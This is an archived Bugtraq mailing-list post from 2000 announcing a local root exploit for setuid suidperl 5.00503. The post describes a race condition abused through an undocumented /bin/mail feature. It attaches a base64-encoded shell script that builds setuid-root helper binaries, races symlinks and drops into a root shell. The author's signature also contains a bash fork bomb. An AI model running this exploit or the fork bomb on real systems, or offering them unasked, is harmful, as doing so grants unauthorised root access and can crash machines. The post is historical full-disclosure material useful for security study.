Date: Sat, 5 Aug 2000 18:39:22 +0200 From: Michal Zalewski <lcamtuf@DIONE.IDS.PL> Subject: sperl 5.00503 (and newer ;) exploit To: BUGTRAQ@SECURITYFOCUS.COM This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --1975728899-1030147653-965493562=:26685 Content-Type: TEXT/PLAIN; charset=US-ASCII Not much to say (except I feel little bit stupid posting it) ... This exploit gives instant root, at least on RedHat 6.x/7.0 Linux boxes I have available for tests... And for sure, all other systems are vulnerable as well - it's just maybe this code will need some refining / tuning / minor changes... Below you'll find brief description of vulnerability and exploit itself, written by me. Please note - I didn't developed everything by myself, I get great support from Sebastian Krahmer - see development history. I still pray he won't get angry on me (probably he will) - but he should be listed at first any time you're talking about this vulnerablity (he made me think with his findings :P). I don't know who should be blamed - perl vendors? /bin/mail vendors for putting undocumented (at least on manpage) features? Hmm... I guess it's nobody's fault ;) Requires: +s perl; bash, gcc, make, usleep (yup, usleep; it's not available on every system, but I have no time to rewrite everything in C; you can grab this code from RedHat distro or so) will be good... Don't mail me if you can't use it - it works. And now, some reading. # # -- PLEASE READ THESE COMMENTS CAREFULLY BEFORE TRYING ANYTHING -- # # Wonderful, lovely, world-smashing, exciting perl exploit. It works against # +s suidperl, exploiting undocumented /bin/mail feature when perl wants to # notify root on inode race conditions. Currently, tested under RH Linux. # # What's probably most shocking, buggy code has following comment inside: # /* heh, heh */. I guess author wasn't laughning last. # # Development history of this exploit is really funny. I found this condition # about 4 months ago, but thought it's useless (who wants to notify root?). # I deleted my test code and didn't left any notes on it. Then, month after # this discovery, Sebastian contacted me. He was working on perl exploit. # He told me he don't know how to cause this condition to happen, but if only # he realise how it can be done, he'll be able to use undocumented /bin/mail # feature - environmental variable 'interactive', which, if set, causes # /bin/mail to interpret ~! commands (subshell requests) even if stdin is not # on terminal. And then I understood what I've done. I spent next month # (yes! no kidding!) trying to recall WHAT THE FSCK was the condition. I # remembered it was trivial, even annoying... And finally, now I'm able to # reconstruct it. # # This exploit tries to fit in rather short, but reasonable time window in # order to exploit bug. I tested it on fast, not overloaded Linux box, and # I guess on slow machines it needs tunning. It needs anything setuid # (/usr/bin/passwd is just fine), writable working directory and something # around 4 minutes. Working directory should be mounted without noexec or # nosuid options (if so, find something like /var/lib/svgalib etc). # # WARNING: On slow machines, it's quite possible this exploit will cause # heavy load. Please test it when system is not overloaded and not used # (eg. at night). # # I'd like to thank Sebastian Krahmer for his help (in fact, HE discovered it # - I think I can say it without shame), and especially thank to several of # my braincells that survived monitor radiation and made me recall this # race condition. # # Send comments, ideas and flames to <lcamtuf@ids.pl> # Tested with sperl 5.00503, but should work with any other as well. # # Good luck and don't abuse it. # _______________________________________________________ Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security] [http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};: =-----=> God is real, unless declared integer. <=-----= --1975728899-1030147653-965493562=:26685 Content-Type: APPLICATION/x-sh; name="xperl.sh" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.21.0008051839220.26685@dione.ids.pl> Content-Description: Content-Disposition: attachment; filename="xperl.sh" IyEvYmluL3NoCgojCiMgICAgLS0gUExFQVNFIFJFQUQgVEhFU0UgQ09NTUVO VFMgQ0FSRUZVTExZIEJFRk9SRSBUUllJTkcgQU5ZVEhJTkcgLS0KIwojIFdv bmRlcmZ1bCwgbG92ZWx5LCB3b3JsZC1zbWFzaGluZywgZXhjaXRpbmcgcGVy bCBleHBsb2l0LiBJdCB3b3JrcyBhZ2FpbnN0CiMgK3Mgc3VpZHBlcmwsIGV4 cGxvaXRpbmcgdW5kb2N1bWVudGVkIC9iaW4vbWFpbCBmZWF0dXJlIHdoZW4g cGVybCB3YW50cyB0bwojIG5vdGlmeSByb290IG9uIGlub2RlIHJhY2UgY29u ZGl0aW9ucy4gQ3VycmVudGx5LCB0ZXN0ZWQgdW5kZXIgUkggTGludXguCiMK IyBXaGF0J3MgcHJvYmFibHkgbW9zdCBzaG9ja2luZywgYnVnZ3kgY29kZSBo YXMgZm9sbG93aW5nIGNvbW1lbnQgaW5zaWRlOgojIC8qIGhlaCwgaGVoICov LiBJIGd1ZXNzIGF1dGhvciB3YXNuJ3QgbGF1Z2huaW5nIGxhc3QuCiMKIyBE ZXZlbG9wbWVudCBoaXN0b3J5IG9mIHRoaXMgZXhwbG9pdCBpcyByZWFsbHkg ZnVubnkuIEkgZm91bmQgdGhpcyBjb25kaXRpb24KIyBhYm91dCA0IG1vbnRo cyBhZ28sIGJ1dCB0aG91Z2h0IGl0J3MgdXNlbGVzcyAod2hvIHdhbnRzIHRv IG5vdGlmeSByb290PykuCiMgSSBkZWxldGVkIG15IHRlc3QgY29kZSBhbmQg ZGlkbid0IGxlZnQgYW55IG5vdGVzIG9uIGl0LiBUaGVuLCBtb250aCBhZnRl cgojIHRoaXMgZGlzY292ZXJ5LCBTZWJhc3RpYW4gY29udGFjdGVkIG1lLiBI ZSB3YXMgd29ya2luZyBvbiBwZXJsIGV4cGxvaXQuCiMgSGUgdG9sZCBtZSBo ZSBkb24ndCBrbm93IGhvdyB0byBjYXVzZSB0aGlzIGNvbmRpdGlvbiB0byBo YXBwZW4sIGJ1dAojIGlmIGhlIHJlYWxpc2UgaG93IGhlIGNhbiBkbyBpdCwg aGUnbGwgYmUgYWJsZSB0byB1c2UgdW5kb2N1bWVudGVkIC9iaW4vbWFpbAoj IGZlYXR1cmUgLSBlbnZpcm9ubWVudGFsIHZhcmlhYmxlICdpbnRlcmFjdGl2 ZScsIHdoaWNoLCBpZiBzZXQsIGNhdXNlcwojIC9iaW4vbWFpbCB0byBpbnRl cnByZXQgfiEgY29tbWFuZHMgKHN1YnNoZWxsIHJlcXVlc3RzKSBldmVuIGlm IHN0ZGluIGlzIG5vdAojIG9uIHRlcm1pbmFsLiBBbmQgdGhlbiBJIHVuZGVy c3Rvb2Qgd2hhdCBJJ3ZlIGRvbmUuIEkgc3BlbnQgbmV4dCBtb250aAojICh5 ZXMhIG5vIGtpZGRpbmchKSB0cnlpbmcgdG8gcmVjYWxsIHdoYXQgdGhlIGZz Y2sgd2FzIHRoZSBjb25kaXRpb24uIEkKIyByZW1lbWJlcmVkIGl0IHdhcyB0 cml2aWFsLCBldmVuIGFubm95aW5nLi4uIEFuZCBmaW5hbGx5LCBub3cgSSdt IGFibGUgdG8KIyByZWNvbnN0cnVjdCBpdC4KIwojIFRoaXMgZXhwbG9pdCB0 cmllcyB0byBmaXQgaW4gcmF0aGVyIHNob3J0LCBidXQgcmVhc29uYWJsZSB0 aW1lIHdpbmRvdyBpbgojIG9yZGVyIHRvIGV4cGxvaXQgaXQuIEkgdGVzdGVk IGl0IG9uIGZhc3QsIG5vdCBvdmVybG9hZGVkIExpbnV4IGJveCwgYW5kCiMg SSBndWVzcyBvbiBzbG93IG1hY2hpbmVzIGl0IG5lZWRzIHR1bm5pbmcuIEl0 IG5lZWRzIGFueXRoaW5nIHNldHVpZAojICgvdXNyL2Jpbi9wYXNzd2QgaXMg anVzdCBmaW5lKSwgd3JpdGFibGUgd29ya2luZyBkaXJlY3RvcnkgYW5kIHNv bWV0aGluZwojIGFyb3VuZCA0IG1pbnV0ZXMuIFdvcmtpbmcgZGlyZWN0b3J5 IHNob3VsZCBiZSBtb3VudGVkIHdpdGhvdXQgbm9leGVjIG9yCiMgbm9zdWlk IG9wdGlvbnMgKGlmIHNvLCBmaW5kIHNvbWV0aGluZyBsaWtlIC92YXIvbGli L3N2Z2FsaWIgZXRjKS4KIwojIFdBUk5JTkc6IE9uIHNsb3cgbWFjaGluZXMs IGl0J3MgcXVpdGUgcG9zc2libGUgdGhpcyBleHBsb2l0IHdpbGwgY2F1c2UK IyBoZWF2eSBsb2FkLiBQbGVhc2UgdGVzdCBpdCB3aGVuIHN5c3RlbSBpcyBu b3Qgb3ZlcmxvYWRlZCBhbmQgbm90IHVzZWQKIyAoZWcuIGF0IG5pZ2h0KS4K IwojCiMgSSdkIGxpa2UgdG8gdGhhbmsgU2ViYXN0aWFuIEtyYWhtZXIgZm9y IGhpcyBoZWxwIChpbiBmYWN0LCBIRSBkaXNjb3ZlcmVkIGl0CiMgLSBJIHRo aW5rIEkgY2FuIHNheSBpdCB3aXRob3V0IHNoYW1lKSwgYW5kIGVzcGVjaWFs bHkgdGhhbmsgdG8gc2V2ZXJhbCBvZgojIG15IGJyYWluY2VsbHMgdGhhdCBz dXJ2aXZlZCBtb25pdG9yIHJhZGlhdGlvbiBhbmQgbWFkZSBtZSByZWNhbGwg dGhpcwojIHJhY2UgY29uZGl0aW9uLgojCiMgU2VuZCBjb21tZW50cywgaWRl YXMgYW5kIGZsYW1lcyB0byA8bGNhbXR1ZkBpZHMucGw+CiMgVGVzdGVkIHdp dGggc3BlcmwgNS4wMDUwMywgYnV0IHNob3VsZCB3b3JrIHdpdGggYW55IG90 aGVyIGFzIHdlbGwuCiMKIyBHb29kIGx1Y2sgYW5kIGRvbid0IGFidXNlIGl0 LgojCgpjbGVhcgoKZWNobyAiU3VpZHBlcmwgNS4wMDUwMyAoYW5kIG5ld2Vy KSByb290IGV4cGxvaXQiCmVjaG8gIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tIgplY2hvICJXcml0dGVuIGJ5IE1pY2hhbCBa YWxld3NraSA8bGNhbXR1ZkBkaW9uZS5pZHMucGw+IgplY2hvICJXaXRoIGdy ZWF0IHJlc3BlY3QgdG8gU2ViYXN0aWFuIEtyYWhtZXIuLi4iCmVjaG8KClNV SURQRVJMPS91c3IvYmluL3N1aWRwZXJsClNVSURCSU49L3Vzci9iaW4vcGFz c3dkCgplY2hvICJbKl0gVXNpbmcgc3VpZHBlcmw9JFNVSURQRVJMLCBzdWlk YmluPSRTVUlEQklOLi4uIgoKaWYgWyAhIC11ICRTVUlEUEVSTCBdOyB0aGVu CiAgZWNobyAiWy1dIFNvcnJ5LCAkU1VJRFBFUkw0IGlzIE5PVCBzZXR1aWQg b24gdGhpcyBzeXN0ZW0gb3IiCiAgZWNobyAiICAgIGRvZXMgbm90IGV4aXN0 IGF0IGFsbC4gSWYgdGhlcmUncyArcyBwZXJsIGJpbmFyeSBhdmFpbGFibGUs IgogIGVjaG8gIiAgICBwbGVhc2UgY2hhbmdlIFNVSURQRVJMIHZhcmlhYmxl IHdpdGhpbiBleHBsb2l0IGNvZGUuIgogIGVjaG8KICBleGl0IDAKZmkKCgpp ZiBbICEgLXUgJFNVSURCSU4gXTsgdGhlbgogIGVjaG8gIlstXSBTb3JyeSwg JFNVSURCSU4gaXMgTk9UIHNldHVpZCBvbiB0aGlzIHN5c3RlbSBvciBkb2Vz IG5vdCBleGlzdCBhdCIKICBlY2hvICIgICAgYWxsLiBQbGVhc2UgcGljayBh bnkgb3RoZXIgK3MgYmluYXJ5IGFuZCBjaGFuZ2UgU1VJREJJTiB2YXJpYWJs ZSIKICBlY2hvICIgICAgd2l0aGluIGV4cGxvaXQgY29kZS4iCiAgZWNobwog IGV4aXQgMApmaQoKZWNobyAiWytdIENoZWNrcyBwYXNzZWQsIGNvbXBpbGlu ZyBmbGFyZXMgYW5kIGhlbHBlciBhcHBsaWNhdGlvbnMuLi4iCmVjaG8KCmNh dCA+ZmxhcmUgPDxfX2VvZl9fCiMhL3Vzci9iaW4vc3VpZHBlcmwKCnByaW50 ICJOb3RoaW5nIGNhbiBzdG9wIG1lIG5vdy4uLlxuIjsKCl9fZW9mX18KCmNh dCA+YmlnaG9sZS5jIDw8X19lb2ZfXwptYWluKCkgewogIHNldHVpZCgwKTsK ICBzZXRnaWQoMCk7CiAgY2hvd24oInN1c2giLDAsMCk7CiAgY2htb2QoInN1 c2giLDA0NzU1KTsKfQpfX2VvZl9fCgpjYXQgPnN1c2guYyA8PF9fZW9mX18K bWFpbigpIHsKICBzZXR1aWQoMCk7CiAgc2V0Z2lkKDApOwogIHN5c3RlbSgi L2Jpbi9iYXNoIik7Cn0KX19lb2ZfXwoKbWFrZSBiaWdob2xlIHN1c2gKCmVj aG8KCmlmIFsgISAteCAuL3N1c2ggXTsgdGhlbgogIGVjaG8gIlstXSBPb3Bz LCBzZWVtcyB0byBtZSBJIGNhbm5vdCBjb21waWxlIGhlbHBlciBhcHBsaWNh dGlvbnMuIEVpdGhlciIKICBlY2hvICIgICAgeW91IGRvbid0IGhhdmUgd29y a2luZyAnbWFrZScgb3IgJ2djYycgdXRpbGl0eS4gSWYgcG9zc2libGUsIgog IGVjaG8gIiAgICBwbGVhc2UgY29tcGlsZSBiaWdob2xlLmMgYW5kIHN1c2gu YyBtYW51YWxseSAodG8gYmlnaG9sZSBhbmQgc3VzaCkuIgogIGVjaG8gCiAg ZXhpdCAwCmZpCgplY2hvICJbK10gU2V0dGluZyB1cCBlbnZpcm9ubWVudC4u LiIKCmNobW9kIDQ3NTUgLi9mbGFyZQoKRklMRU5BTUU9J25vbmUKCn4hYmln aG9sZQoKJwpleHBvcnQgaW50ZXJhY3RpdmU9MQpQQVRIPS46JFBBVEgKCmVj aG8gIlsrXSBTdGFydGluZyBleHBsb2l0LiBJdCBjb3VsZCB0YWtlIHVwIHRv IDUgbWludXRlcyBpbiBvcmRlciB0byBnZXQiCmVjaG8gIlsrXSB3b3JraW5n IHJvb3Qgc2hlbGwuIFdBUk5JTkcgLSBXQVJOSU5HIC0gV0FSTklORzogaXQg Y291bGQgY2F1c2UiCmVjaG8gIlsrXSBoZWF2eSBzeXN0ZW0gbG9hZC4iCgp3 aGlsZSA6OyBkbwogICggbG4gLWYgLXMgJFNVSURCSU4gIiRGSUxFTkFNRSI7 dXNsZWVwICRSQU5ET007IG5pY2UgLW4gKzIwICRTVUlEUEVSTCAuLyIkRklM RU5BTUUiIDwuL2ZsYXJlICYgKSAmPi9kZXYvbnVsbCAmCiAgKCB1c2xlZXAg JFJBTkRPTSA7IGxuIC1mIC1zIC9kZXYvc3RkaW4gIiRGSUxFTkFNRSIgKSAm Pi9kZXYvbnVsbCAmCiAgaWYgWyAtdSAuL3N1c2ggXTsgdGhlbgogICAgZWNo bwogICAgZWNobyAiWytdIFZPSUxBLCBCQUJFIDotKSBFbnRlcmluZyByb290 c2hlbGwuLi4iCiAgICBlY2hvCiAgICBybSAtZiAiJEZJTEVOQU1FIiBzdXNo LmMgYmlnaG9sZSBiaWdob2xlLmMgZmxhcmUKICAgIC4vc3VzaAogICAgZWNo bwogICAgZWNobyAiWytdIFRoYW5rIHlvdSBmb3IgdXNpbmcgTWFyY2hldyBJ bmR1c3RyaWVzIC8gZHVwYS5yeWJhIHByb2R1Y3RzLiIKICAgIGVjaG8KICAg IHJtIC1mICIkRklMRU5BTUUiIHN1c2guYyBiaWdob2xlIGJpZ2hvbGUuYyBm bGFyZSBzdXNoCiAgICBleGl0IDAKICBmaQpkb25lCgo= --1975728899-1030147653-965493562=:26685--